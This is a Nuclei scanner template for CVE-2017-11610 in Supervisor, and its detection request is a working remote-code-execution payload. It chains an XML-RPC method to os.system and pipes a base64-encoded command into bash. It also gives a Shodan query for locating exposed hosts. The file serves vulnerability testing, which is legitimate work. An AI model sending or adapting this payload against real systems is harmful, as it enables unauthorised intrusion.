nuclei-templates/cves/2017/CVE-2017-11610.yaml

51 lines
1.2 KiB
YAML
Raw Normal View History

2021-11-15 23:27:25 +00:00
id: CVE-2017-11610
info:
name: Supervisor XMLRPC Exec (CVE-2017-11610)
author: notnotnotveg
severity: critical
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
description: Typically runs on port tcp/9001
tags: cve,cve2017,rce,supervisor
metadata:
shodan-query: 'http.title:"Supervisor Status"'
requests:
- payloads:
raw:
- |
POST /RPC2 HTTP/1.1
Host: {{Hostname}}
Accept: text/xml
Content-type: text/xml
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length:
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>echo -n bHM= |base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<methodResponse>"
part: body
- type: word
words:
- "<int>0</int>"
part: body